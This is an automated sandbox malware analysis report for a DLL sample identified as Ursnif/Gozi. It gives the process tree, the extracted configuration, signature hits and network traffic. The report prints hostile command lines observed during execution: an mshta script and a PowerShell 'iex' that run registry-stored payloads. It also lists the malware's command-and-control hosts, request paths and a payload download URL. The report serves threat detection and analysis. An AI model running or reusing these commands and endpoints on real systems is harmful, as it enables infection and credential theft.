Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278

Overview

General Information

Sample Name:SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278 (renamed file extension from 25278 to dll)
Analysis ID:353281
MD5:f76b81b0397ae313b8f6d19d95c49edf
SHA1:8f15106b524cc5db564845508a04ee3bf2709949
SHA256:3e8b92cda2c0d1dc74de0b060f43c2baf23ab08af69667ddbbe66f78d5e0389a

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5576 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll' MD5: 8081BC925DFC69D40463079233C90FA5)
    • regsvr32.exe (PID: 5876 cmdline: regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 5528 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • rundll32.exe (PID: 6488 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • cmd.exe (PID: 1440 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • iexplore.exe (PID: 1380 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 6192 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6552 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6864 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6940 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82978 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 492 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5424 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4136 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5732 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6124 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 2920 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6908 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9090.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "353", "system": "2f28121f12f6b0f75396fd38214a7a6chh0N", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613433491", "user": "902d52678695dc15e71ab15c1d8e8ed0", "hash": "0xf857f57e", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmpGoziRuleWin32.GoziCCN-CERT
    • 0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
    00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          Click to see the 30 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5424, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', ProcessId: 4136
          Sigma detected: MSHTA Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 492, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5424
          Sigma detected: Suspicious Rundll32 ActivityShow sources
          Source: Process startedAuthor: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5528, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 6488

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://c56.lepini.at/jvassets/xI/t64.datAvira URL Cloud: Label: phishing
          Found malware configurationShow sources
          Source: regsvr32.exe.5876.2.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "353", "system": "2f28121f12f6b0f75396fd38214a7a6chh0N", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613433491", "user": "902d52678695dc15e71ab15c1d8e8ed0", "hash": "0xf857f57e", "soft": "3"}
          Multi AV Scanner detection for domain / URLShow sources
          Source: c56.lepini.atVirustotal: Detection: 8%Perma Link
          Source: api3.lepini.atVirustotal: Detection: 10%Perma Link
          Source: api10.laptok.atVirustotal: Detection: 10%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllVirustotal: Detection: 16%Perma Link
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllReversingLabs: Detection: 10%

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
          Uses new MSVCR DllsShow sources
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
          Uses secure TLS version for HTTPS connectionsShow sources
          Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49759 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.810092544.0000017964DD0000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.818415180.0000022D72ED0000.00000002.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
          Source: Binary string: \wl.pdb9 source: powershell.exe, 00000017.00000003.858136800.000001F6E100F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033F3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_033F3512
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB7500 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,32_2_04DB7500
          Source: C:\Windows\explorer.exeCode function: 32_2_04DBAACC CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,32_2_04DBAACC
          Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
          Source: Joe Sandbox ViewIP Address: 104.20.184.68 104.20.184.68
          Source: Joe Sandbox ViewIP Address: 151.101.1.44 151.101.1.44
          Source: Joe Sandbox ViewASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
          Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
          Source: global trafficHTTP traffic detected: GET /api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJkO/Am1fQoOyYzGbM/xK7yrntx/Hruw1HZvAcfYl7dS_2F5g51/rLGjgSsh9h/OW8nevv3Dh4VYPuXW/03beET_2FA3a/YKD8HGeNgat/jK8A9eho17ABaL/cUew4H72hIfxngPdnFseX/f9MvJYHFQTCCYMoN/XdpbU1hBHNX722p/DPf7k1CgkBZqmPOtaO/MB_2B0Lh_/2FdHYj_2Bx0ZSPs6m_2F/GelX35xSpPMKNfn0Q3D/54O_2FBBcuPBTrZpvB9zhY/7AC9yYriaqcnPDRgK/E HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api1/ACRDYIo3vDDkE8nBO7rZ_2F/RKqyjTnG2z/bw24fKr8FPY8iC_2F/NOd8pP1qrd_2/B0zRVNFer70/12v4aw2Bat1oWp/EdxqaQHccPmd48WBI_2Fh/ZsZf5oFs1F5WVpMV/Aql6isAZLQXMGYV/uCpbF51_2FaHU68PIY/HN1L8Jeq6/71Of32mfKV_2FEsbc40d/blSVHi4z_2F2u7ZVT2S/LNeMbeXi5H54yUd71Yke04/YvCLg_2BV_2FO/HHmC2v0g/tP9YiJq20QZR4sjpPzGs48R/leCqM3qCaD/cvMCdxcgqejP1dFql/2a73eaCZuJLy/90fQzPpEVBC/OzDkRB7t1Aba9y/CFI HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FNzdBvmlH/vt_2B9x1x6ck65MR/ZpG7Z5d4NVWsbef/IA3fJ5Djq3zGkBqE7x/LReOBCAcB/qC_2F1dmcLdFTOEEnZgz/STGZ2dxkKMV5RKreGCr/RFkW6kLd_2Bklvq9QHSZcn/We3rTC8YPIxkv/L14t5cJM/ZLd1Hb81ZBMybrjlIjy_2Fg/_2F_2FS_2F/TBW_2Bf883H2QksUF/tthcWoumhUqM/8KeCGS7jeEC/1wCg0gHPiLWtYc/_2Fsv97M6I2fbFhoAJh9s/q_2FhY0fUvPWozDY/zNJTP3X_2B7F8/ha HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
          Source: global trafficHTTP traffic detected: GET /api1/_2F5TIxM/R_2B3lAdX7FSifvLwGRNf4T/Xn6jTZLuMx/wh5E4h_2FPyrBTqQP/YDN8egogNxbu/ymacPdIkir0/NKKNzqD2vuGYxD/EQ2iBv1vi_2FKgbC6jRvO/67ImFcDLm_2FOZDz/QiB35x1OBx9fyp0/LL2dXEqoTiSnjkl_2B/cqWZBDCtg/kw_2BqWxxyjtsXEtMuCO/OQivEAtVKK4aYWaKL3G/xgxPJ7qQNKlWaEOMoFWGiX/qJDWe3oU_2FIN/ksLvpLmR/pIAQEZhwMl9o8sI2Dx0z5d9/PBFpDZPttD/KT6P6hofH96qtO4zq/sMAC80l_2B/o HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
          Source: global trafficHTTP traffic detected: GET /api1/CVY_2B2WcFg2WjFu/gTASghvlaHDPZO5/OnfU03dRZmchUYorkJ/dtBA9sUmC/RowLHURoIpKv4i_2BgTY/G_2FIDqlTidiAlM0ssd/yjlpSbFr2QpoSO_2FENF6f/dTadM34HuUeK4/m4bwoeqS/4fYaIXnfqcsUEE_2FB4NB_2/FC2CDtfTvl/j09rSh75dvBI36PLe/jkDP0mf1Pjoo/MVDfZBDaObB/6QQIVykudU_2Fa/gB7utb_2BlN2NWtlVRg_2/BGfyNFafrreq_2B2/aeR3kQJGNtvuKDQ/P4hWZXg9_2BWc1HVsP/HL5s0z5R3/Zml2TISAgHQ/gJzI HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
          Source: unknownDNS traffic detected: queries for: www.msn.com
          Source: unknownHTTP traffic detected: POST /api1/Khaq04rDnev_2/FB_2BFzU/KI8bdPSAY3R_2FidTJv71m3/dvU3r7d2eL/scd3pdNtCTeJ_2Frq/OWGS0ExfsOsM/_2BPwAW1LdR/SHcm3WZGYcVW6D/WtMm_2BnA73XtQqx5ww7P/YAGrQTEZeVeHRogx/_2B99ZfB_2FmilX/7ChN3r52DnFdh04GaB/pT5_2FX83/Scw9iSPgYS8zehsLEcf9/v_2BuI3_2FeSXD8dbjK/TGxhWKgJt8_2B4wSzTBFun/2pwogTmb20mC4/H981V6qe/2_2BDwr9k_2Bpe4F_2BBGiU/1EiWwRg_2F/w_2FIQs5ggG07bgU_/2BwAzRket4TL/oTov HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Content-Length: 2Host: api3.lepini.at
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 15 Feb 2021 23:58:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
          Source: regsvr32.exe, 00000002.00000003.779376557.000000000362E000.00000004.00000001.sdmp, explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FN
          Source: explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJk
          Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
          Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
          Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
          Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000017.00000002.859665043.000001F6C8B31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000020.00000002.1020876214.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000017.00000003.858426776.000001F6E137C000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.co
          Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: explorer.exe, 00000020.00000000.844032000.000000000A897000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49759 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
